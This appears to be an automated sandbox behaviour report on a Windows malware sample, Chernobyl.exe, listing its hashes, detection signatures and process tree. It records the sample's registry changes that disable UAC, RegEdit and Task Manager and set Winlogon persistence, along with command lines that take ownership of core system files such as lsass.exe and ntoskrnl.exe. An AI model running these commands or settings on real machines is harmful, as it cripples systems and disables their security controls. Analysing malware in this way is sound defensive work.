Analysis
max time kernel: 39s
max time network: 18s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 02-03-2024 19:39
Static task: static1
Behavioral task: behavioral1
Sample: Chernobyl.exe
Resource: win7-20240221-en
General
Target: Chernobyl.exe
Size: 338KB
MD5: 0f6ef368d9dfdf12dcf44f727fbd4d5c
SHA1: 5bbf583c7d0f74255c13b7bbdb5d5609d80393e9
SHA256: 30acb23863a1043c7210c8fb75236fce5111bef305c6574e518e9d0e50d740cf
SHA512: 16e211d19604b49c4b6837f580ec2c83cb27868f481d3ee33394716110e32ac363165bed5e9445c3807753cac793e5a044c3986d10ab04cfbd832c68438f546c
SSDEEP: 6144:Ubeo02222222222222222222222222222222222222222222222222222222222w:QkHOZzv4TatsNqaJA
Malware Config
Signatures
Modifies WinLogon for persistence (2 TTPs, 1 IoC)
Processes: Chernobyl.exe
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, cluttscape.exe" (Chernobyl.exe)
UAC bypass (1 IoC)
Processes: Chernobyl.exe
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (Chernobyl.exe)
Disables RegEdit via registry modification (1 IoC)
Processes: Chernobyl.exe
  Set value (int): \REGISTRY\USER\S-1-5-21-778096762-2241304387-192235952-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" (Chernobyl.exe)
Disables Task Manager via registry modification
Possible privilege escalation attempt (14 IoCs)
Processes (pid, process):
  872 takeown.exe
  2656 takeown.exe
  2460 takeown.exe
  1700 takeown.exe
  2960 takeown.exe
  1772 icacls.exe
  1760 takeown.exe
  3064 takeown.exe
  3040 takeown.exe
  2468 takeown.exe
  2920 icacls.exe
  2564 takeown.exe
  2552 takeown.exe
  2512 icacls.exe
Modifies file permissions (1 TTPs, 14 IoCs)
Processes (pid, process):
  872 takeown.exe
  2656 takeown.exe
  2552 takeown.exe
  2468 takeown.exe
  2512 icacls.exe
  2960 takeown.exe
  1760 takeown.exe
  2920 icacls.exe
  1700 takeown.exe
  3064 takeown.exe
  1772 icacls.exe
  2564 takeown.exe
  3040 takeown.exe
  2460 takeown.exe
Checks whether UAC is enabled (2 IoCs)
Processes: Chernobyl.exe
  Key value queried: \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Chernobyl.exe)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (Chernobyl.exe)
Modifies WinLogon (2 TTPs, 2 IoCs)
Processes: Chernobyl.exe
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoRestartShell = "0" (Chernobyl.exe)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\DisableCAD = "1" (Chernobyl.exe)
Drops file in System32 directory (1 IoC)
Processes: Chernobyl.exe
  File opened for modification: C:\Windows\SysWOW64\kill.ico (Chernobyl.exe)
Drops file in Windows directory (2 IoCs)
Processes: Chernobyl.exe
  File opened for modification: C:\Windows\cluttscape.exe (Chernobyl.exe)
  File created: C:\Windows\cluttscape.exe (Chernobyl.exe)
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Modifies registry class (1 IoC)
Processes: Chernobyl.exe
  Set value (str): \REGISTRY\MACHINE\SOFTWARE\Classes\Unknown\DefaultIcon\ = "C:\\Windows\\SysWow64\\kill.ico" (Chernobyl.exe)
Suspicious use of AdjustPrivilegeToken (14 IoCs)
Processes (token, pid, process):
  SeDebugPrivilege 2104 Chernobyl.exe
  SeDebugPrivilege 2104 Chernobyl.exe
  SeTakeOwnershipPrivilege 1760 takeown.exe
  SeTakeOwnershipPrivilege 1700 takeown.exe
  SeTakeOwnershipPrivilege 872 takeown.exe
  SeTakeOwnershipPrivilege 3064 takeown.exe
  SeTakeOwnershipPrivilege 2656 takeown.exe
  SeTakeOwnershipPrivilege 2564 takeown.exe
  SeTakeOwnershipPrivilege 3040 takeown.exe
  SeTakeOwnershipPrivilege 2460 takeown.exe
  SeTakeOwnershipPrivilege 2552 takeown.exe
  SeTakeOwnershipPrivilege 2468 takeown.exe
  SeTakeOwnershipPrivilege 2960 takeown.exe
  SeShutdownPrivilege 2104 Chernobyl.exe
Suspicious use of WriteProcessMemory (64 IoCs; the report repeats each parent/child pair several times, the repeats are collapsed here and the list is truncated in the source)
Processes (source pid, source process, target pid, target process):
  2104 Chernobyl.exe wrote to memory of 320 cmd.exe
  320 cmd.exe wrote to memory of 1456 rundll32.exe
  2104 Chernobyl.exe wrote to memory of 1508 cmd.exe
  1508 cmd.exe wrote to memory of 1760 takeown.exe
  2104 Chernobyl.exe wrote to memory of 1692 cmd.exe
  1692 cmd.exe wrote to memory of 1700 takeown.exe
  2104 Chernobyl.exe wrote to memory of 2252 cmd.exe
  2252 cmd.exe wrote to memory of 872 takeown.exe
  2252 cmd.exe wrote to memory of 2920 icacls.exe
  2104 Chernobyl.exe wrote to memory of 2528 cmd.exe
  2528 cmd.exe wrote to memory of 3064 takeown.exe
  2104 Chernobyl.exe wrote to memory of 2544 cmd.exe
  2544 cmd.exe wrote to memory of 2656 takeown.exe
  2104 Chernobyl.exe wrote to memory of 2712 cmd.exe
  2712 cmd.exe wrote to memory of 2564 takeown.exe
  2104 Chernobyl.exe wrote to memory of 2684 cmd.exe
System policy modification (1 TTPs, 3 IoCs)
Processes: Chernobyl.exe
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\shutdownwithoutlogon = "0" (Chernobyl.exe)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\UseDefaultTile = "1" (Chernobyl.exe)
  Set value (int): \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" (Chernobyl.exe)
Processes (indented by process-tree depth)
C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe (PID 2104)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Chernobyl.exe"
  - Modifies WinLogon for persistence
  - UAC bypass
  - Disables RegEdit via registry modification
  - Checks whether UAC is enabled
  - Modifies WinLogon
  - Drops file in System32 directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  C:\Windows\SysWOW64\cmd.exe (PID 320)
    Command line: "C:\Windows\System32\cmd.exe" /k start RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\rundll32.exe (PID 1456)
      Command line: RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
  C:\Windows\SysWOW64\cmd.exe (PID 1508)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\smss.exe && icacls C:\Windows\System32\smss.exe /grant "%username%:F" && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 1760)
      Command line: takeown /f C:\Windows\System32\smss.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 1692)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\csrss.exe && icacls C:\Windows\System32\csrss.exe /grant "%username%:F" && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 1700)
      Command line: takeown /f C:\Windows\System32\csrss.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2252)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\wininit.exe && icacls C:\Windows\System32\wininit.exe /grant "%username%:F" && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 872)
      Command line: takeown /f C:\Windows\System32\wininit.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\icacls.exe (PID 2920)
      Command line: icacls C:\Windows\System32\wininit.exe /grant "Admin:F"
      - Possible privilege escalation attempt
      - Modifies file permissions
  C:\Windows\SysWOW64\cmd.exe (PID 2528)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant "%username%:F" && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 3064)
      Command line: takeown /f C:\Windows\System32\LogonUI.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2544)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\lsass.exe && icacls C:\Windows\System32\lsass.exe /grant "%username%:F" && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2656)
      Command line: takeown /f C:\Windows\System32\lsass.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2712)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\services.exe && icacls C:\Windows\System32\services.exe /grant "%username%:F" && exit
    - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\takeown.exe (PID 2564)
      Command line: takeown /f C:\Windows\System32\services.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2684)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winlogon.exe && icacls C:\Windows\System32\winlogon.exe /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 3040)
      Command line: takeown /f C:\Windows\System32\winlogon.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2688)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.efi && icacls C:\Windows\System32\winload.efi /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 2460)
      Command line: takeown /f C:\Windows\System32\winload.efi
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2660)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\winload.exe && icacls C:\Windows\System32\winload.exe /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 2552)
      Command line: takeown /f C:\Windows\System32\winload.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
  C:\Windows\SysWOW64\cmd.exe (PID 2436)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\ntoskrnl.exe && icacls C:\Windows\System32\ntoskrnl.exe /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 2468)
      Command line: takeown /f C:\Windows\System32\ntoskrnl.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\icacls.exe (PID 2512)
      Command line: icacls C:\Windows\System32\ntoskrnl.exe /grant "Admin:F"
      - Possible privilege escalation attempt
      - Modifies file permissions
  C:\Windows\SysWOW64\cmd.exe (PID 2952)
    Command line: "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\svchost.exe && icacls C:\Windows\System32\svchost.exe /grant "%username%:F" && exit
    C:\Windows\SysWOW64\takeown.exe (PID 2960)
      Command line: takeown /f C:\Windows\System32\svchost.exe
      - Possible privilege escalation attempt
      - Modifies file permissions
      - Suspicious use of AdjustPrivilegeToken
    C:\Windows\SysWOW64\icacls.exe (PID 1772)
      Command line: icacls C:\Windows\System32\svchost.exe /grant "Admin:F"
      - Possible privilege escalation attempt
      - Modifies file permissions
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
  Abuse Elevation Control Mechanism (1)
    Bypass User Account Control (1)
  Boot or Logon Autostart Execution (2)
    Winlogon Helper DLL (2)
Downloads
C:\Users\Admin\Desktop\—↕óÂ∩ïé☺¤Σ≈Ç—Σ▼■¼ñ¢▼■²█ó╠╔▌ž5£♣☼↕řσ▲¶▼Σ²9®Âπ◘šŸßä≈♫íí╬♫◙▼☼í¾╧♂¾◙¢≈¾å™◙╚╔≈¬¢®ïπ☻♪æ♥πœŸ▌åÇ◘₧—↕≈ž86☺¥éč (file name as recorded by the sandbox; non-printable characters)
  Filesize: 666B
  MD5: 9e1e5883c74742a497cf5c272ccd2321
  SHA1: 2cf33e34d08b8e17743a60352baffef4b6f02dee
  SHA256: ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
  SHA512: f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b